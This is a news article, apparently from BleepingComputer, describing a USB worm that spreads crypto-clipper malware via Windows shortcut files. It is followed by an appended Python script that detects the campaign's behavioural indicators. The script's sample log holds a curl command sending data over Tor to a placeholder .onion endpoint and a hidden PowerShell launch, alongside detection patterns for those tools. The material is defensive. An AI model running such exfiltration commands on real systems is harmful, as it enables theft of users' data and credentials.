USB worm spreads crypto-stealing malware via Windows shortcut files

by · BleepingComputer

Threat actors targeting cryptocurrency wallets have been distributing clipboard-stealing malware with self-spreading capabilities and using the Tor network to conceal communication.

The campaign has been active since at least February and relies on LNK (shortcut) files on USB drives to push clipper malware that monitors clipboard contents and replaces cryptocurrency wallet addresses with ones controlled by the attacker.

Additionally, it monitors for seed phrases and private keys, and can capture screenshots that are exfiltrated over Tor.

Infection and worm propagation

Microsoft says that the infection process starts with the victim opening the LNK file, triggering the malware on the USB drive. Additional payloads are staged from a .ONION address.

A local scan searches for document files on the system. When such files are found, the malware hides the originals and replaces them with malicious shortcuts bearing the same names. This causes the malware to execute when users attempt to open the documents.

The worm creates a scheduled task that monitors for newly connected USB storage devices. When a removable drive is connected, the malware copies itself to the device and creates additional malicious shortcut files.

[Figure: Execution flow overview. Source: Microsoft]

Data stealer

The stealer component executes after checking that Task Manager is not running, then establishes communications with the command-and-control (C2) host through a bundled Tor executable (ugate.exe).

Every half a second, the malware checks the clipboard for the following data:

  • 12-word BIP39 seed phrases
  • 24-word BIP39 seed phrases
  • Ethereum private keys
  • Bitcoin WIF keys
  • Bitcoin legacy, P2SH, Bech32, and Taproot wallet addresses
  • Tron wallet addresses
  • Monero wallet addresses

The targeted addresses are chosen based on their starting digits or characters to partially resemble the attackers’ wallet addresses, to lower the chance of the user discovering the fraud at a quick glance.

[Figure: Function to replace the wallet address. Source: Microsoft]

Apart from monitoring the clipboard, the malware also captures five screenshots of the victim’s screen every ten seconds and sends them to the C2 using the curl tool.

According to Microsoft, there is also support for remote code execution, which can be triggered by a C2 EVAL instruction. Specifically, the malware downloads JavaScript content into a file named ‘cfile,’ and executes it on the infected machine.

The researchers say that the strongest indicators of an infection are behavioral rather than signature-based, and recommend monitoring for process activity on wscript.exe and cscript.exe, unexpected launches of curl, PowerShell, and cmd.exe, along with unusual child processes.

Also, connections to ‘localhost:9050’ and Tor proxy activity are red flags associated with this campaign.
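The behavioral indicators listed above, turned into a small triage routine as an added example (this is not Microsoft's or BleepingComputer's code). The Sysmon-style key=value log format, the field names and all sample records are constructed for the demonstration; the .onion host and pids are placeholders.

```python
# Added example: flags script hosts (wscript/cscript) spawning curl, PowerShell
# or cmd, curl invocations that reference a .onion host, and connections to the
# local Tor SOCKS port 9050. The log format below is constructed, not Sysmon's.
TOR_SOCKS_PORT = "9050"
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SUSPICIOUS_CHILDREN = {"curl.exe", "powershell.exe", "cmd.exe"}

def parse_event(line):
    """Split one 'k=v|k=v|...' record into a dict (cmdline must be last)."""
    return dict(field.split("=", 1) for field in line.split("|"))

def image_name(path):
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the indicator names one event matches (empty list if none)."""
    hits = []
    if event["type"] == "process":
        parent, child = image_name(event["parent"]), image_name(event["image"])
        if parent in SCRIPT_HOSTS and child in SUSPICIOUS_CHILDREN:
            hits.append("script_host_spawn")   # wscript/cscript -> curl/powershell/cmd
        if child == "curl.exe" and ".onion" in event.get("cmdline", "").lower():
            hits.append("curl_onion")          # staging/exfil via a Tor hidden service
    elif event["type"] == "network":
        if event["dst"] in ("127.0.0.1", "localhost") and event["dport"] == TOR_SOCKS_PORT:
            hits.append("tor_socks_localhost")  # traffic to the local Tor SOCKS proxy
    return hits

def triage(lines):
    """Run classify over raw records; return (image, pid, hits) for each match."""
    results = []
    for line in lines:
        ev = parse_event(line)
        hits = classify(ev)
        if hits:
            results.append((image_name(ev["image"]), ev["pid"], hits))
    return results

# Constructed sample telemetry; placeholder host and pids, no real IoCs.
SAMPLE_LOG = [
    r"type=process|pid=4120|parent=C:\Windows\explorer.exe|image=C:\Windows\System32\wscript.exe|cmdline=wscript.exe E:\loader.js",
    r"type=process|pid=5011|parent=C:\Windows\System32\wscript.exe|image=C:\Windows\System32\curl.exe|cmdline=curl.exe --socks5-hostname 127.0.0.1:9050 http://placeholder.onion/up",
    r"type=network|pid=5011|image=C:\Windows\System32\curl.exe|dst=127.0.0.1|dport=9050",
    r"type=process|pid=5200|parent=C:\Windows\explorer.exe|image=C:\Windows\System32\cmd.exe|cmdline=cmd.exe /c dir",
    r"type=process|pid=5302|parent=C:\Windows\System32\cscript.exe|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|cmdline=powershell.exe -nop -w hidden",
    r"type=network|pid=6001|image=C:\Program Files\Browser\browser.exe|dst=203.0.113.5|dport=443",
]

if __name__ == "__main__":
    for image, pid, hits in triage(SAMPLE_LOG):
        print(f"{image} (pid {pid}): {', '.join(hits)}")
```

The checks are deliberately loose (no allow-list for legitimate curl or PowerShell use), so in production they belong in a SIEM rule with tuning for your environment rather than as a standalone alert.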
